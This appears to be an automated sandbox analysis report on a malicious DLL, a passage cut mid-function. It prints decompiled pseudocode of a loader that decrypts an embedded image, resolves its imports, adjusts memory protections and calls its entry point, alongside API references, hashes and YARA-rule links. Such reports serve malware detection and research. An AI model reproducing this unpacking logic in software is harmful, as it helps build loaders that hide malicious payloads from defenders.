						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e164140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e1651a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e164140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E16113E
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E161204
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E16121F

Strings

May 5 2021, xrefs: 6E161171

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 5 2021
API String ID: 4010158826-1965333733
Opcode ID: 9d658d59fc7e4b85581e698d62bbebd9ab6d779a7ea88f6059784bc28315f443
Instruction ID: e175af7a63c025f7d3610f67998c76883fce728db0d5e937520889fd7b62e9c3
Opcode Fuzzy Hash: 9d658d59fc7e4b85581e698d62bbebd9ab6d779a7ea88f6059784bc28315f443
Instruction Fuzzy Hash: 48417E71E0021A9FDF01CFD9C890AEEBBB6BF95310F248129D904B7244C774AA5ADB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E16173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E16173D(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E161237(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e161746
0x6e16174b
0x6e161759
0x6e16175e
0x6e16175e
0x6e161764
0x6e161769
0x6e16176d
0x6e161771
0x6e161771
0x6e16177b
0x6e161784

APIs

GetCurrentThread.KERNEL32 ref: 6E161740
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E16174B
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E16175E
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E161771

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 001cab5fd47696d65aa760f2ff56c45ee6b2afd0ab3e8b049e0a6e994626ce8c
Instruction ID: 82e3f280956f99ca7a4b775da1f4a950083471344552f976644612b155fec6e4
Opcode Fuzzy Hash: 001cab5fd47696d65aa760f2ff56c45ee6b2afd0ab3e8b049e0a6e994626ce8c
Instruction Fuzzy Hash: D9E09B313066115BAA416A694C88E7F776CDFD23717118236F521D61D0CB50CC1BA5B5

Uniqueness

Uniqueness Score: -1.00%

Function 6E161E32, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E161E32(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e164140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e161e3c
0x6e161e49
0x6e161e4f
0x6e161e5b
0x6e161e6b
0x6e161e6d
0x6e161e75
0x6e161f0a
0x6e161f11
0x00000000
0x00000000
0x00000000
0x6e161e7b
0x6e161e7b
0x6e161e7b
0x6e161e7f
0x00000000
0x00000000
0x6e161e8b
0x6e161e8f
0x6e161eb3
0x6e161eb7
0x6e161ecb
0x6e161ecb
0x6e161ed1
0x6e161ee0
0x6e161ee4
0x6e161eec
0x6e161eec
0x6e161ef4
0x6e161ef7
0x6e161f04
0x00000000
0x00000000
0x00000000
0x00000000
0x6e161f04
0x6e161ebf
0x6e161ec3
0x6e161ec9
0x00000000
0x00000000
0x00000000
0x6e161ec9
0x6e161e97
0x6e161e9b
0x6e161ea5
0x6e161e9d
0x6e161e9d
0x6e161e9d
0x00000000
0x6e161e9b
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E161E6B
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E161EE0
GetLastError.KERNEL32 ref: 6E161EE6

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 50445ae39ac5e4337ee44dafe516459b9d800ffc22ec4a2ecf73d2586599e427
Instruction ID: 95f0392796f2622aea4a7429fa547577b995d3c09b324411ab9d999a2a073199
Opcode Fuzzy Hash: 50445ae39ac5e4337ee44dafe516459b9d800ffc22ec4a2ecf73d2586599e427
Instruction Fuzzy Hash: 00216032E0020AEFDB15CFD9C891AAAF7F5FF04319F408859D50697454E3B8E6A9DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E161424, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161424() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e164144;
				if( *0x6e16412c > 5) {
					_t16 = _t15 + 0x6e1650f9;
				} else {
					_t16 = _t15 + 0x6e1650b1;
				}
				E6E1610BC(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E161A26( &_v32,  &_v16,  *0x6e164140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e164138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E161352(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e164138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E162032(_t44, _t32 + 4);
						}
					}
					_t25 = E6E161699(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6e16142a
0x6e16143b
0x6e161445
0x6e16143d
0x6e16143d
0x6e16143d
0x6e16144c
0x6e161455
0x6e16145a
0x6e161478
0x6e1614d4
0x6e16147a
0x6e161480
0x6e161486
0x6e161494
0x6e161498
0x6e16149f
0x6e1614a8
0x6e1614ac
0x6e1614b2
0x6e1614c3
0x6e1614b4
0x6e1614ba
0x6e1614ba
0x6e1614b2
0x6e1614cb
0x6e1614cb
0x6e1614d6

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6E161480
ExitThread.KERNEL32 ref: 6E1614D6

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 88e33be9b6ee9384e49e799c1687a739f4b064316914a1ff9c16df06a2451a2c
Instruction ID: 97707a8f4e0a17eb700c2865e7f77cd746e2141eb0e4821386bf9b6dce8427f1
Opcode Fuzzy Hash: 88e33be9b6ee9384e49e799c1687a739f4b064316914a1ff9c16df06a2451a2c
Instruction Fuzzy Hash: 6411DD722086059FDF51DFE4C858E9B77FCAB56314F018826F048D7190EB30E899AB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AA760, Relevance: 1.8, APIs: 1, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E1A6ED0: RtlEnterCriticalSection.NTDLL(?), ref: 6E1A6EDF

RtlAllocateHeap.NTDLL(6E247728,00000000,?), ref: 6E1AA8EF

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AllocateCriticalEnterHeapSection
String ID:
API String ID: 8947104-0
Opcode ID: 7d73243a3b6f475e8b5bf2917b37043e3e305ad50db399ee2108a04f2a6c3af5
Instruction ID: fdc2fec2b2f4a8b1d0a58abb71758d952c664ebbd419e74329b7ff02b33a6a10
Opcode Fuzzy Hash: 7d73243a3b6f475e8b5bf2917b37043e3e305ad50db399ee2108a04f2a6c3af5
Instruction Fuzzy Hash: 1FB162B8900609EFDB04CF98D894BAD77B6FB49314F208519E915AB3C0D775A981DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1610BC, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E1610BC(void* __eax, intOrPtr _a4) {

				 *0x6e164150 =  *0x6e164150 & 0x00000000;
				_push(0);
				_push(0x6e16414c);
				_push(1);
				_push(_a4);
				 *0x6e164148 = 0xc; // executed
				L6E1610E2(); // executed
				return __eax;
			}

0x6e1610bc
0x6e1610c3
0x6e1610c5
0x6e1610ca
0x6e1610cc
0x6e1610d0
0x6e1610da
0x6e1610df

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E161451,00000001,6E16414C,00000000), ref: 6E1610DA

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 17fdab31b15b9925b45b317364c5a20a17245e40c02a2be2ce916c0b99c4a721
Instruction ID: bb6dc26df15e3368f408539d295603f0899c387c010939a7bbf617d3e7c19ab8
Opcode Fuzzy Hash: 17fdab31b15b9925b45b317364c5a20a17245e40c02a2be2ce916c0b99c4a721
Instruction Fuzzy Hash: 75C04CB4141741A7EE609BD08C59F567B717762709F218504F614252C0C3B520A9A555

Uniqueness

Uniqueness Score: -1.00%

Function 6E161699, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E161699(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e164140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e164140 - 0x63698bc4 &  !( *0x6e164140 - 0x63698bc4);
				_t18 = E6E16150D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e164140 - 0x63698bc4 &  !( *0x6e164140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e164140 - 0x63698bc4 &  !( *0x6e164140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E161000(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E6E1617FA(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E6E161E32(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E16133D(_t42);
					L8:
					return _t29;
				}
			}

0x6e1616a1
0x6e1616a3
0x6e1616bf
0x6e1616d0
0x6e1616d7
0x6e161735
0x00000000
0x6e1616d9
0x6e1616d9
0x6e1616e3
0x6e1616e7
0x6e1616ec
0x6e1616f4
0x6e1616f8
0x6e1616fd
0x6e161702
0x6e161706
0x6e16170b
0x6e16170c
0x6e161710
0x6e161715
0x6e16171d
0x6e16171d
0x6e161715
0x6e161706
0x6e1616f8
0x6e16171f
0x6e161728
0x6e16172c
0x6e161736
0x6e16173c
0x6e16173c

APIs

Part of subcall function 6E16150D: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1616D5,?,?,?,?,?,00000002,?,6E1614D0), ref: 6E161531
Part of subcall function 6E16150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E161553
Part of subcall function 6E16150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E161569
Part of subcall function 6E16150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E16157F
Part of subcall function 6E16150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E161595
Part of subcall function 6E16150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E1615AB

Part of subcall function 6E161000: memcpy.NTDLL(?,?,?), ref: 6E161037
Part of subcall function 6E161000: memcpy.NTDLL(?,?,?), ref: 6E16106C

Part of subcall function 6E1617FA: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E161832

Part of subcall function 6E161E32: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E161E6B
Part of subcall function 6E161E32: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E161EE0
Part of subcall function 6E161E32: GetLastError.KERNEL32 ref: 6E161EE6

GetLastError.KERNEL32(?,6E1614D0), ref: 6E161717

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 56dbfc3b5bc35acc5554c35b8c5ea58c3f111394b8d7cb4e664e2ece79f57200
Instruction ID: b4aac408b7935fe77e0e9bf35d0eaba38bb205de8b983c48bdd33b852cae3707
Opcode Fuzzy Hash: 56dbfc3b5bc35acc5554c35b8c5ea58c3f111394b8d7cb4e664e2ece79f57200
Instruction Fuzzy Hash: F9115B7A7007016BC760DAE98C80DDB77BDAF982197044428EA069B600D7B0ED5E97A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1A0FE0, Relevance: 86.1, APIs: 47, Strings: 2, Instructions: 399COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0FEC
Mailbox.LIBCMTD ref: 6E1A1044
DName::isEmpty.LIBCMTD ref: 6E1A1054
operator+.LIBVCRUNTIMED ref: 6E1A1081
Mailbox.LIBCMTD ref: 6E1A108D
operator+.LIBVCRUNTIMED ref: 6E1A10A7
Mailbox.LIBCMTD ref: 6E1A10B3
DName::operator+.LIBCMTD ref: 6E1A1169
Mailbox.LIBCMTD ref: 6E1A1172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A119B

Part of subcall function 6E19E050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E19E07B
Part of subcall function 6E19E050: Mailbox.LIBCMTD ref: 6E19E0C6

operator+.LIBVCRUNTIMED ref: 6E1A11AD

Part of subcall function 6E1997C0: DName::operator+.LIBCMTD ref: 6E1997E1

DName::operator+.LIBCMTD ref: 6E1A11C4

Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998B0
Part of subcall function 6E1998A0: DName::operator+=.LIBCMTD ref: 6E1998BD
Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998C9

Mailbox.LIBCMTD ref: 6E1A11E3
DName::operator+.LIBCMTD ref: 6E1A121E
Mailbox.LIBCMTD ref: 6E1A1227
DName::operator+.LIBCMTD ref: 6E1A1463
Mailbox.LIBCMTD ref: 6E1A146C
DName::operator+.LIBCMTD ref: 6E1A11DA

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

DName::isEmpty.LIBCMTD ref: 6E1A1492
DName::operator=.LIBVCRUNTIMED ref: 6E1A14A0
DName::DName.LIBVCRUNTIMED ref: 6E1A14C4
DName::operator+.LIBCMTD ref: 6E1A14DA
DName::operator+.LIBCMTD ref: 6E1A14F0
Mailbox.LIBCMTD ref: 6E1A14F9
DName::operator=.LIBVCRUNTIMED ref: 6E1A1507
Mailbox.LIBCMTD ref: 6E1A1513

Strings

-, xrefs: 6E1A10F0
@, xrefs: 6E1A1487

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
String ID: -$@
API String ID: 625857421-1222683799
Opcode ID: 805b7531d707289e61c42f741f7e17834d619f9b7064a1123618dd89c75056a1
Instruction ID: 9f1cf9fb405c3f4fb23249d8ff771c2b24fbb36c36090db65691e3114a560737
Opcode Fuzzy Hash: 805b7531d707289e61c42f741f7e17834d619f9b7064a1123618dd89c75056a1
Instruction Fuzzy Hash: 66F166B5E00508DFDB05DFE4DCA0FFEB779AF55304F108569E216AA180EB705A88EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F080, Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

operator+.LIBVCRUNTIMED ref: 6E19F09F

Part of subcall function 6E1997F0: DName::DName.LIBVCRUNTIMED ref: 6E1997FD
Part of subcall function 6E1997F0: DName::operator+.LIBCMTD ref: 6E199810

DName::DName.LIBVCRUNTIMED ref: 6E19F0DD

Strings

), xrefs: 6E19F10C

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: NameName::$Name::operator+operator+
String ID: )
API String ID: 308612335-2427484129
Opcode ID: de4bd6fdd91937a16c781364d707f51ec3f350e614d7cf258eed9bd703cd42ff
Instruction ID: 2befd8281daaeb8e38eb9ab910cf7be6395094aa88cbc5949196a2eab14442f0
Opcode Fuzzy Hash: de4bd6fdd91937a16c781364d707f51ec3f350e614d7cf258eed9bd703cd42ff
Instruction Fuzzy Hash: 4CE142B5D00108FFDB04DBE4DCA5AEE7779AB55308F208565E525A7180EB30AB84FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1911D0, Relevance: 61.8, APIs: 41, Instructions: 290libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(6E20A358), ref: 6E1911D9
GetProcAddress.KERNEL32(?,6E20A374), ref: 6E1911EB
GetProcAddress.KERNEL32(?,6E20A380), ref: 6E191208
GetProcAddress.KERNEL32(?,6E20A388), ref: 6E191225
GetProcAddress.KERNEL32(?,6E20A394), ref: 6E191241
GetProcAddress.KERNEL32(?,6E20A3A0), ref: 6E19125E
GetProcAddress.KERNEL32(?,6E20A3BC), ref: 6E19127B
GetProcAddress.KERNEL32(?,6E20A3D0), ref: 6E191298
GetProcAddress.KERNEL32(?,6E20A3E0), ref: 6E1912B5
GetProcAddress.KERNEL32(?,6E20A3F4), ref: 6E1912D2
GetProcAddress.KERNEL32(?,6E20A408), ref: 6E1912EF
GetProcAddress.KERNEL32(?,6E20A420), ref: 6E19130C
GetProcAddress.KERNEL32(?,6E20A434), ref: 6E191329
GetProcAddress.KERNEL32(?,6E20A454), ref: 6E191346
GetProcAddress.KERNEL32(?,6E20A46C), ref: 6E191363
GetProcAddress.KERNEL32(?,6E20A484), ref: 6E191380
GetProcAddress.KERNEL32(?,6E20A498), ref: 6E19139D
GetProcAddress.KERNEL32(?,6E20A4AC), ref: 6E1913BA
GetProcAddress.KERNEL32(?,6E20A4C8), ref: 6E1913D7
GetProcAddress.KERNEL32(?,6E20A4E8), ref: 6E1913F4
GetProcAddress.KERNEL32(?,6E20A504), ref: 6E191411
GetProcAddress.KERNEL32(?,6E20A518), ref: 6E19142E
GetProcAddress.KERNEL32(?,6E20A52C), ref: 6E19144B
GetProcAddress.KERNEL32(?,6E20A53C), ref: 6E191468
GetProcAddress.KERNEL32(?,6E20A55C), ref: 6E191485
GetProcAddress.KERNEL32(?,6E20A578), ref: 6E1914A2
GetProcAddress.KERNEL32(?,6E20A598), ref: 6E1914BF
GetProcAddress.KERNEL32(?,6E20A5B4), ref: 6E1914DC
GetProcAddress.KERNEL32(?,6E20A5CC), ref: 6E1914F9
GetProcAddress.KERNEL32(?,6E20A5E8), ref: 6E191516
GetProcAddress.KERNEL32(?,6E20A604), ref: 6E191533
GetProcAddress.KERNEL32(?,6E20A618), ref: 6E191550
GetProcAddress.KERNEL32(?,6E20A630), ref: 6E19156D
GetProcAddress.KERNEL32(?,6E20A64C), ref: 6E19158A
GetProcAddress.KERNEL32(?,6E20A664), ref: 6E1915A7
GetProcAddress.KERNEL32(?,6E20A680), ref: 6E1915C4
GetProcAddress.KERNEL32(?,6E20A698), ref: 6E1915E1
GetProcAddress.KERNEL32(?,6E20A6B0), ref: 6E1915FE
GetProcAddress.KERNEL32(?,6E20A6C4), ref: 6E19161B
GetProcAddress.KERNEL32(?,6E20A6D4), ref: 6E191638
GetProcAddress.KERNEL32(?,6E20A6E4), ref: 6E191655

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: 15bebab6df022e502455faf99efa3eea67bfa438f3c0286c0bc25254aa478a21
Instruction ID: d36be3b29bc17e8781f40d520df5bd63e067875e36e9953757856ca7266a54ea
Opcode Fuzzy Hash: 15bebab6df022e502455faf99efa3eea67bfa438f3c0286c0bc25254aa478a21
Instruction Fuzzy Hash: 33C131B5A00104EFDB19DBA4C598E6DBBB6FB45300F908569EA22DF784DF348E40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1971A0, Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 427COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E197242
___vcrt_getptd.LIBVCRUNTIMED ref: 6E197252
___vcrt_getptd.LIBVCRUNTIMED ref: 6E19725D
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1972BA
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1972C5
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1972D0
_Smanip.LIBCPMTD ref: 6E197342

Part of subcall function 6E1AD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1CC799,?,?,6E1A5367,?), ref: 6E1AD2D2

Is_bad_exception_allowed.LIBVCRUNTIMED ref: 6E1972F9

Part of subcall function 6E198360: type_info::operator==.LIBVCRUNTIMED ref: 6E19839D

___DestructExceptionObject.LIBCMTD ref: 6E19730E
std::bad_alloc::bad_alloc.LIBCMTD ref: 6E19731C

Part of subcall function 6E195B50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 6E195BEA

__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E1973CC
weak_ptr.LIBCPMTD ref: 6E197423
__FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 6E19742F
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E197439
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6E197445
CatchIt.LIBCMTD ref: 6E1974F3

Strings

csm, xrefs: 6E1971F4
csm, xrefs: 6E197275
csm, xrefs: 6E19734A

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructFeatureHardwareIs_bad_exception_allowedMap::endObjectPresentProcessorRaiseSmanipstd::bad_alloc::bad_alloctype_info::operator==weak_ptr
String ID: csm$csm$csm
API String ID: 2369658663-393685449
Opcode ID: b8ecb7d849fe1bc6c82df064b4a58ce8c43c85d225f22ed9e1bc8dc7ef4d1a5b
Instruction ID: 29aa5a5ca77b1d1e0f21f7c9b57929c2d1488ecea0e9654aeffa56145fe8b55d
Opcode Fuzzy Hash: b8ecb7d849fe1bc6c82df064b4a58ce8c43c85d225f22ed9e1bc8dc7ef4d1a5b
Instruction Fuzzy Hash: 1BF1A1B5900209AFDB04CFE5C890AEE7779BF54348F50851AE9159B281DB30EAC5FBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F9C0, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19F9CC
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19F9D4
DName::DName.LIBVCRUNTIMED ref: 6E19FA34
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19FA44
operator+.LIBVCRUNTIMED ref: 6E19FA6E
DName::operator+=.LIBCMTD ref: 6E19FA94
DName::operator+=.LIBCMTD ref: 6E19FA9E
Mailbox.LIBCMTD ref: 6E19FAC2
DName::DName.LIBVCRUNTIMED ref: 6E19FC1D
DName::DName.LIBVCRUNTIMED ref: 6E1A02F5
